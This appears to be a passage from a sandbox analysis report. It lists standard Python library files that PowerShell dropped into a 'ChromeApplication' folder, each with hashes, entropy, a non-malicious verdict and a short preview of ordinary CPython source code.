                                                                                                                                                                                                  SSDEEP:3:16dWRIXJ7LRAuKLRAM174adR8iDFoNFH9LmduQ26GKadR6n:14WI57LRERHNT8iD6HaMQEpT6
                                                                                                                                                                                                  MD5:031F54940ABDF481926457972FD90E0F
                                                                                                                                                                                                  SHA1:75689CDC1D790A7BC71E507903A00882DB6B652A
                                                                                                                                                                                                  SHA-256:758A96E17249E1E97C5CA5D1EE39AA31E5D439D0922AE7AF0064318E70B59FC8
                                                                                                                                                                                                  SHA-512:187E365C0237144C2C3827305B8BB678BFE5161A4AC4AC0E115F78C199DE3D18438FA124CF4303A9175F82FBE8E45057A733337B35ED8B20F9575A18B066A8DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from _contextvars import Context, ContextVar, Token, copy_context......__all__ = ('Context', 'ContextVar', 'Token', 'copy_context')..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\copy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8985
                                                                                                                                                                                                  Entropy (8bit):4.414349685597416
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Ve6OGrNnrFPC7ar5Rl4VoJTjIiWJYbOqmwKbgm0qu0JQZGWGyV:46OGrNnrFoivbJTR3m0L
                                                                                                                                                                                                  MD5:EF129FD70ED7839F65F7F8CF39EA1B74
                                                                                                                                                                                                  SHA1:867C3ED0C4E926460AF3370F1F555DF8E6E7334A
                                                                                                                                                                                                  SHA-256:82AFA1D570D4D328EFBBA5CDE3FC21025A44E3CFE5E10D9316A73745194A236B
                                                                                                                                                                                                  SHA-512:3108600E03CD66C5BBE2CD37D5539DC961CF62F2385CC4BFB3F15B5FBED0485B820DB753A4EDEC7C4891DAE2CB3A6520C705BD2E3830A014A9D88524FB7A93B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Generic (shallow and deep) copying operations.....Interface summary:.... import copy.... x = copy.copy(y) # make a shallow copy of y.. x = copy.deepcopy(y) # make a deep copy of y....For module specific errors, copy.Error is raised.....The difference between shallow and deep copying is only relevant for..compound objects (objects that contain other objects, like lists or..class instances).....- A shallow copy constructs a new compound object and then (to the.. extent possible) inserts *the same objects* into it that the.. original contains.....- A deep copy constructs a new compound object and then, recursively,.. inserts *copies* into it of the objects found in the original.....Two problems often exist with deep copy operations that don't exist..with shallow copy operations:.... a) recursive objects (compound objects that, directly or indirectly,.. contain a reference to themselves) may cause a recursive loop.... b) because deep copy copies *eve

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\copyreg.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7645
                                                                                                                                                                                                  Entropy (8bit):4.489970415664536
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:i0YOWh6nk2vypRXb+7wV+0Xi+xCgGoqn4zs3ftHvpRDkT3LHQXTNS/DK:i7D6n/aDAwV+2UzoWI+fxxRyAS/DK
                                                                                                                                                                                                  MD5:5B6BA7867D653890AF7572CC0AAAB479
                                                                                                                                                                                                  SHA1:6877D39632885002917342DF18E83BEBD42339EA
                                                                                                                                                                                                  SHA-256:E5BF33A527D7251F17BFD491AD0F0858E1A3C4C7C10DC5E578FDB6C80C8F9336
                                                                                                                                                                                                  SHA-512:841389A1C64F9384F17F78C929D4161B42CE3389F6AC47666CF1B3CCFEF77F2033EBC86087CB2878BEE336623FC1FAD772F3CD751A57E3797CE0807D75E115BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Helper to provide extensibility for pickle.....This is only useful to add pickle support for extension types defined in..C, not for instances of user-defined classes..."""....__all__ = ["pickle", "constructor",.. "add_extension", "remove_extension", "clear_extension_cache"]....dispatch_table = {}....def pickle(ob_type, pickle_function, constructor_ob=None):.. if not callable(pickle_function):.. raise TypeError("reduction functions must be callable").. dispatch_table[ob_type] = pickle_function.... # The constructor_ob function is a vestige of safe for unpickling... # There is no reason for the caller to pass it anymore... if constructor_ob is not None:.. constructor(constructor_ob)....def constructor(object):.. if not callable(object):.. raise TypeError("constructors must be callable")....# Example: provide pickling support for complex numbers.....try:.. complex..except NameError:.. pass..else:.... def pickle_complex(c):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\crypt.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3968
                                                                                                                                                                                                  Entropy (8bit):4.824103634261663
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dIq0/Rp6HYaRBfmqj0vAhdjFRIJSXt/yOTHXQ:hrlfmo0cjFR8ot/yOjQ
                                                                                                                                                                                                  MD5:32B7E13B0D5DB6085076605DC93A4FFF
                                                                                                                                                                                                  SHA1:639C5571A9118FC62C0CF24D6D07A1340126F7CB
                                                                                                                                                                                                  SHA-256:3C30CC40B548B1EF7009CE2F378F5516F5E2FB325208C377D892D3ABB4A2EA88
                                                                                                                                                                                                  SHA-512:C8579D85830254EF0BBF2B9E7EDFF694807A99B36DBB8BC5C8456FCF6F9465ABEFF9A77AD143AE9C609B73830C60A6CE534A850069332B3956252A8C9979D386
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Wrapper to the POSIX crypt library call and associated functionality."""....import sys as _sys....try:.. import _crypt..except ModuleNotFoundError:.. if _sys.platform == 'win32':.. raise ImportError("The crypt module is not supported on Windows").. else:.. raise ImportError("The required _crypt module was not built as part of CPython")....import errno..import string as _string..from random import SystemRandom as _SystemRandom..from collections import namedtuple as _namedtuple......_saltchars = _string.ascii_letters + _string.digits + './'.._sr = _SystemRandom()......class _Method(_namedtuple('_Method', 'name ident salt_chars total_size')):.... """Class representing a salt method per the Modular Crypt Format or the.. legacy 2-character crypt method.""".... def __repr__(self):.. return '<crypt.METHOD_{}>'.format(self.name)......def mksalt(method=None, *, rounds=None):.. """Generate a salt for the specified method..... If not specified, the

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\csv.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16474
                                                                                                                                                                                                  Entropy (8bit):4.36498470229318
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:vhxqK/P/zv/3I4aU/J4aJQ8cSLsuxCErDFYCiFBwbxZYwUu/6TTNMnzFcIO/sw:v1X3pLbNFrDiBwnC/acbsw
                                                                                                                                                                                                  MD5:CC8985ECA9F01BE5592599AEB491413C
                                                                                                                                                                                                  SHA1:0A0D6B94B6E0FFD07EF0A4B91F638FA5FADF9E18
                                                                                                                                                                                                  SHA-256:D5194CB311061A9AE2D0BF0B6A51C1ECEC011CDC2B5E6EBA91820C91FB00AC97
                                                                                                                                                                                                  SHA-512:D887C8CC8FF58D32F05C5797DC0189DB004CDF4D49C488BCFDC1A03A5BDAAA902DCDB998A4130D16C71B69B3BA34793E5E7984FEB75385E4FB77A03AEA6FC207
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:.."""..csv.py - read/write/investigate CSV files.."""....import re..from _csv import Error, __version__, writer, reader, register_dialect, \.. unregister_dialect, get_dialect, list_dialects, \.. field_size_limit, \.. QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \.. __doc__..from _csv import Dialect as _Dialect....from io import StringIO....__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",.. "Error", "Dialect", "__doc__", "excel", "excel_tab",.. "field_size_limit", "reader", "writer",.. "register_dialect", "get_dialect", "list_dialects", "Sniffer",.. "unregister_dialect", "__version__", "DictReader", "DictWriter",.. "unix_dialect"]....class Dialect:.. """Describe a CSV dialect..... This must be subclassed (see csv.excel). Valid attributes are:.. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.. lineterminator,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\README.ctypes

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):302
                                                                                                                                                                                                  Entropy (8bit):4.852668847464629
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:8z2wHVpWObNLeQ9exK2kbFYQxEMWLh2jvW/oz2tHRAuyn:8z20hFeOT1DMd2jvb2txa
                                                                                                                                                                                                  MD5:7AD62828A8A0FCA041912A20B451904E
                                                                                                                                                                                                  SHA1:A90A30E3BC7CCC4800DB1A31DC3CDE3B7C4A86FD
                                                                                                                                                                                                  SHA-256:99F3754DEC345ED71E2BCB337E3CDC58B1A4C02D290D870DC20CCDD1FF543AE1
                                                                                                                                                                                                  SHA-512:0E111B5D5282ECE51BA41980D4DE56A38FF7A826173A9D883925968EE71BD664C74436FF319CF4AEF482972BC3689A75AADDE2359C2EEAA91D32B9DA534FCAAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Files in this directory come from Bob Ippolito's py2app.....License: Any components of the py2app suite may be distributed under..the MIT or PSF open source licenses.....This is version 1.0, SVN revision 789, from 2006/01/25...The main repository is http://svn.red-bean.com/bob/macholib/trunk/macholib/

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):163
                                                                                                                                                                                                  Entropy (8bit):4.7583014539285395
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:IG7yVQV368exRnfNAoWQJpKNdeATVYaFWKOvouRBeofHOtvZLl:IR6V3exRn5WQbceAJYasKOvou3HOV1l
                                                                                                                                                                                                  MD5:B4E0F252AC2C050A15FAE8D8D5153924
                                                                                                                                                                                                  SHA1:B66E8FF57523BDC8E3C1947D84E137B54CEF0E69
                                                                                                                                                                                                  SHA-256:AD449177F69D3150373892859AFF90A1882982E9ABA313B919711B7F38370DEF
                                                                                                                                                                                                  SHA-512:B627C5F8A3E16201F4E223AC30A69BA27D1778B9D28DC6B4CFF900EF8123262FAF4E250796E30BF7CA1CA997AD70F15A59B940E19A4DB675DA3892F2C1FB4BC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..Enough Mach-O to make your head spin.....See the relevant header files in /usr/include/mach-o....And also Apple's documentation..."""....__version__ = '1.0'..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\dyld.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5456
                                                                                                                                                                                                  Entropy (8bit):4.9203067310922455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:63JF54Kcs5IwOijuELt+hE5zGQ1RK+G9nMexZs0tugAoEwdGfs0tutPScYu5DB7k:4d4KDOl6Vo4pRi9nlXs0sgx8fs0stPSX
                                                                                                                                                                                                  MD5:57341ED3630EE8675E3F70C89F977280
                                                                                                                                                                                                  SHA1:A63BDDE3913B5076F96C5C6216955BEB07BFB18F
                                                                                                                                                                                                  SHA-256:5DAD086AF985C3578C5F1A0C2E8D85BBFC3073624697CDB8E34C46CA9496B161
                                                                                                                                                                                                  SHA-512:D1E1A783FA2EA305622A28AB822377B5E4ADFF1894547DC5CBA1D946F6E43E506179C4A49C0C4CCB335220C73F9223F3E33556885D5CABD5FA20D338E3C761BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..dyld emulation.."""....import os..from ctypes.macholib.framework import framework_info..from ctypes.macholib.dylib import dylib_info..from itertools import *..try:.. from _ctypes import _dyld_shared_cache_contains_path..except ImportError:.. def _dyld_shared_cache_contains_path(*args):.. raise NotImplementedError....__all__ = [.. 'dyld_find', 'framework_find',.. 'framework_info', 'dylib_info',..]....# These are the defaults as per man dyld(1)..#..DEFAULT_FRAMEWORK_FALLBACK = [.. os.path.expanduser("~/Library/Frameworks"),.. "/Library/Frameworks",.. "/Network/Library/Frameworks",.. "/System/Library/Frameworks",..]....DEFAULT_LIBRARY_FALLBACK = [.. os.path.expanduser("~/lib"),.. "/usr/local/lib",.. "/lib",.. "/usr/lib",..]....def dyld_env(env, var):.. if env is None:.. env = os.environ.. rval = env.get(var).. if rval is None:.. return [].. return rval.split(':')....def dyld_image_suffix(env=None):.. if env is No

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\dylib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1891
                                                                                                                                                                                                  Entropy (8bit):4.849862491793074
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:vS4hodWSQY3a/U12KWYVCdpZIE8HO28Ubbqha8:vNod7QY3a8WYVCdpZ/Hhf
                                                                                                                                                                                                  MD5:CEF944CCD77C054FB37749652A30E9F0
                                                                                                                                                                                                  SHA1:44FCAC974EDCE984915A60305CE0EF2D34D5B1AE
                                                                                                                                                                                                  SHA-256:144D1FCC7C611A8B50CD48AFBC288DF896E47FD1A1A6A10473811A4DDFF03ED0
                                                                                                                                                                                                  SHA-512:A3BA1F4BA4EF470138C086BAFDBB382E0ADB31CF3C411C5A552A78ECCD34407110A5676F456990E15AD665140A3BAF7034D750452904A263188611BBA2349CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..Generic dylib path manipulation.."""....import re....__all__ = ['dylib_info']....DYLIB_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+?).. (?:\.(?P<version>[^._]+))?.. (?:_(?P<suffix>[^._]+))?.. \.dylib$..)..""")....def dylib_info(filename):.. """.. A dylib name can take one of the following four forms:.. Location/Name.SomeVersion_Suffix.dylib.. Location/Name.SomeVersion.dylib.. Location/Name_Suffix.dylib.. Location/Name.dylib.... returns None if not found or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.SomeVersion_Suffix.dylib',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present... """.. is_dylib = DYLIB_RE.match(filename).. if not is_dylib:.. return None.. return is_dylib.groupdict()

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\fetch_macholib

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                  Entropy (8bit):4.592685213899164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:TKH4o8xYdp14T7LtH77RXQ6Iaygn:ho82b2tHRAuygn
                                                                                                                                                                                                  MD5:03FC2CB5CFDE6E1C4A2699CD2193133D
                                                                                                                                                                                                  SHA1:F7FA6A9D1369B55F332E7E21AFE647C2DA05F81B
                                                                                                                                                                                                  SHA-256:7B9EB3A8AF1D12DA22604845995982CA99992876A825F3765E053DDB592620AB
                                                                                                                                                                                                  SHA-512:3CB6955D49468F961896DEDFA7AD51FA608D3E9BA5B88946410DD106827040C34F65DEB0DEBBAA6255E11F1380E11FE08310C4688F9845AFA0141178F848248C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:#!/bin/sh..svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\fetch_macholib.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75
                                                                                                                                                                                                  Entropy (8bit):4.514880857909424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Sydp14T7LtH77RXQ6Iaygn:tb2tHRAuygn
                                                                                                                                                                                                  MD5:B88DFC5590F1D09D550605F3AFCAC0D7
                                                                                                                                                                                                  SHA1:6724D16CF05434F9B77179D3A340A800EB1AF0DD
                                                                                                                                                                                                  SHA-256:7497FBDBB98AFCA4AC455E3A057C59BCDEBAF1280E25C94741DC301F05CB53E5
                                                                                                                                                                                                  SHA-512:B154B6C65DD7407D412BBC1BB91D73EE6CBEB94AFE21BF46531B82110095F4F58A80B9A6975FF5FE6902116A313FF22FA50BE33429A643D7C35287C0E0BB2BB1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\framework.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2266
                                                                                                                                                                                                  Entropy (8bit):4.8758008419339305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RQXAITOwx5A4C0gWHa/Uyb4WHPCdpzGxPiEO+M7uqabYAVle066aa:RSAITJx5A4CPWHaaWHPCdpzGxPiwHqaf
                                                                                                                                                                                                  MD5:0FBD9BB28049B7EF685F3E27DEBA9B7F
                                                                                                                                                                                                  SHA1:46A6DA7FF03A4574EB15BAFC154FCB4FAB8CC5E0
                                                                                                                                                                                                  SHA-256:AF9721872CB633DD93195C40D4404FDFDF1F1B293DFD0956015A22378033A5A8
                                                                                                                                                                                                  SHA-512:4A8ACCAE43D9A621A30BE78D4C2D3A2697C2EB7528F72B8DDC74D24D5FBED747C49AD129FA33C4EA218C8849DDEFEDE2CF967C9855C4047E1E27E457A7DC68B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""..Generic framework path manipulation.."""....import re....__all__ = ['framework_info']....STRICT_FRAMEWORK_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+).framework/.. (?:Versions/(?P<version>[^/]+)/)?.. (?P=shortname).. (?:_(?P<suffix>[^_]+))?..)$..""")....def framework_info(filename):.. """.. A framework name can take one of the following four forms:.. Location/Name.framework/Versions/SomeVersion/Name_Suffix.. Location/Name.framework/Versions/SomeVersion/Name.. Location/Name.framework/Name_Suffix.. Location/Name.framework/Name.... returns None if not found, or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.framework/Versions/SomeVersion/Name_Suffix',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_anon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2613
                                                                                                                                                                                                  Entropy (8bit):4.133177272037021
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:evl6VWz6dtcyOnAWK90rqx89lG6bgZOmYtj66s5taWj6dUCcy8qupe:evw9dtcy7NOpUuhs5tapd1cy8quA
                                                                                                                                                                                                  MD5:0386EA58C0BDBE99EFDC92A7D4B0496A
                                                                                                                                                                                                  SHA1:1BC6866200E63EE83B9E483ED822D37914E439CD
                                                                                                                                                                                                  SHA-256:3EA0C4294653BAAE3AF691C979123E7DA16E5F946D34B5EE9808E7BF7406B06C
                                                                                                                                                                                                  SHA-512:889504A51B2584F68F9393EB8072BE0FACB5C800356CA70106C4E76D5A6F0291226BA408BD74ED6AB14C76DFADB3CF85E37D651710AB6B376F1A47145D301BA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest..import test.support..from ctypes import *....class AnonTest(unittest.TestCase):.... def test_anon(self):.. class ANON(Union):.. _fields_ = [("a", c_int),.. ("b", c_int)].... class Y(Structure):.. _fields_ = [("x", c_int),.. ("_", ANON),.. ("y", c_int)].. _anonymous_ = ["_"].... self.assertEqual(Y.a.offset, sizeof(c_int)).. self.assertEqual(Y.b.offset, sizeof(c_int)).... self.assertEqual(ANON.a.offset, 0).. self.assertEqual(ANON.b.offset, 0).... def test_anon_nonseq(self):.. # TypeError: _anonymous_ must be a sequence.. self.assertRaises(TypeError,.. lambda: type(Structure)("Name",.. (Structure,),.. {"_fields_": [], "_anonymous_": 42})).... def test_anon_nonmember(self):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_array_in_pointer.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1802
                                                                                                                                                                                                  Entropy (8bit):4.655095624975382
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Fxtjx93CMQW9LP7uQwhuzAgbTM9QQHlgsChTM7ANAgbTM9aikQKaXgsChTM7Cpe:FxtjxtCMQEDuQpMjqfMmMJ4awfMmA
                                                                                                                                                                                                  MD5:7972CD74387DCFB9143CF40360601C54
                                                                                                                                                                                                  SHA1:B622488E6C4909D3E701C3D8440A93440D4322A7
                                                                                                                                                                                                  SHA-256:E819FE83514B6A585D6B999901AE949A6C9D4EBA876D92AEB8F1AA2E71D94067
                                                                                                                                                                                                  SHA-512:70F81816BF8B3DF2C47D40ADCC3CEEDFA9C1E5B96559CEADC0816D697E8B9FBA0D8F25EB9BC5DD7E2D67E284E32DF331CE415F4EE34248264664E92062BCF06D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest..from ctypes import *..from binascii import hexlify..import re....def dump(obj):.. # helper function to dump memory contents in hex, with a hyphen.. # between the bytes... h = hexlify(memoryview(obj)).decode().. return re.sub(r"(..)", r"\1-", h)[:-1]......class Value(Structure):.. _fields_ = [("val", c_byte)]....class Container(Structure):.. _fields_ = [("pvalues", POINTER(Value))]....class Test(unittest.TestCase):.. def test(self):.. # create an array of 4 values.. val_array = (Value * 4)().... # create a container, which holds a pointer to the pvalues array... c = Container().. c.pvalues = val_array.... # memory contains 4 NUL bytes now, that's correct.. self.assertEqual("00-00-00-00", dump(val_array)).... # set the values of the array through the pointer:.. for i in range(4):.. c.pvalues[i].val = i + 1.... values = [c.pvalues[i].val for i in range(4)].... # Th

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_arrays.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7743
                                                                                                                                                                                                  Entropy (8bit):4.563084758602701
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:FrUFGNUsDcgsyMtA1mzC3LEdhqOx4h9BUIbBRVWq/y:lU8UsIgsyMtTOEdh9w9JBDy
                                                                                                                                                                                                  MD5:BDB5B5B9FB0E9E0D2E1B305094DA1FA2
                                                                                                                                                                                                  SHA1:E69920FCB70B1519A21580E75231482D208BE2EF
                                                                                                                                                                                                  SHA-256:5673E5CF445FF496D4D02F93C3D5C129D2E8CEB62642C26A186C79CB6BFEB221
                                                                                                                                                                                                  SHA-512:6D2B9C47184B74F7BDC2067F6D59BC62364FC6346568C09457FF656D7022AF4C84EFF48489805A05677B7E9B6A50327D259A8807E993851881697B753770AD90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest..from test.support import bigmemtest, _2G..import sys..from ctypes import *....from ctypes.test import need_symbol....formats = "bBhHiIlLqQfd"....formats = c_byte, c_ubyte, c_short, c_ushort, c_int, c_uint, \.. c_long, c_ulonglong, c_float, c_double, c_longdouble....class ArrayTestCase(unittest.TestCase):.. def test_simple(self):.. # create classes holding simple numeric types, and check.. # various properties..... init = list(range(15, 25)).... for fmt in formats:.. alen = len(init).. int_array = ARRAY(fmt, alen).... ia = int_array(*init).. # length of instance ok?.. self.assertEqual(len(ia), alen).... # slot values ok?.. values = [ia[i] for i in range(alen)].. self.assertEqual(values, init).... # out-of-bounds accesses should be caught.. with self.assertRaises(IndexError): ia[alen].. with self.assertRaises(Ind

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_as_parameter.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7149
                                                                                                                                                                                                  Entropy (8bit):4.801824751400148
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:FxAm1tipn5TEez1KzCNpP7aw7eKEdELEdcWEy3dwU+7xqwJAbaMT/YiYvku/PqWv:Ftip51Lp/eTceWhMPYBvk0P59qObuZy
                                                                                                                                                                                                  MD5:E8AE379E7175932C155F30F2780DD733
                                                                                                                                                                                                  SHA1:C6634A41FBC500864B7900040DFED535BFB090EB
                                                                                                                                                                                                  SHA-256:8225672DF52A662CB66C1B59A8328068C378017031A480689BDDCBD4D964244D
                                                                                                                                                                                                  SHA-512:49AC143F44219741379D608424042A94C9D9094CEA78F64D623B5DFCE3A27EB6B6118694F8200C41CE245491019DDAA44109CDF90AE0B38AD01B4B55809A282C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
